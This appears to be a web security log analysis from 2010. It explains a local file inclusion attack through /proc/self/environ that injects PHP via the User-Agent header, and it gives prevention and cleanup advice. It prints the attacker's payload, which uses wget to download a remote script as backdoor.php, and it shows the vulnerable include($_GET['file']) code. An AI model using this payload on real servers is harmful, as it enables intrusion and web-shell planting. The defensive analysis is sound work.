Event Details
Date
21 June 2010
POST Values
file: ../../proc/self/environ
SERVER Values
HTTP_USER_AGENT:
<? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.
What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.
The visitor hopes that my code that handles file inclusion is written something like this:
<?php
// Include file requested
include($_GET['file']);
?>
Thus the file that will be included would be:
/var/www/../../proc/self/environ (which equates to /proc/self/environ)
The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:
DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_HOST=www.example.com HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_ADMIN=webmaster@example.com SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)
However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:
<?
// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");
>
Now the hacker can now visit his page and run any commands he wants on your webserver.
http://www.example.com/backdoor.php
How to prevent this
- Sanitize your inputs
- Ensure that directory traversal is disabled/checked for
- Work with an allowed list of files
$allowed_files = array('file1.php', 'file2.php');
$allowed_index = array_search($_GET['file'], $allowed_files)
if ($allowed_index !== NULL)
{
include $allowed_files[$allowed_index];
} - Don't allow visitors to specify by name
$allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
if (!empty($allowed_files[$_GET['file']]))
{
include $allowed_files[$_GET['file']];
}
Threat Level
High
Course of Action
If this has happened to you, do the following:
- Take the server offline (if possible)
- Check active process list for unknown scripts and kill them
- Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
- Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
- Remove backdoor scripts
- Monitor you logs. The hacker will probably return and attempt to reinfect your server.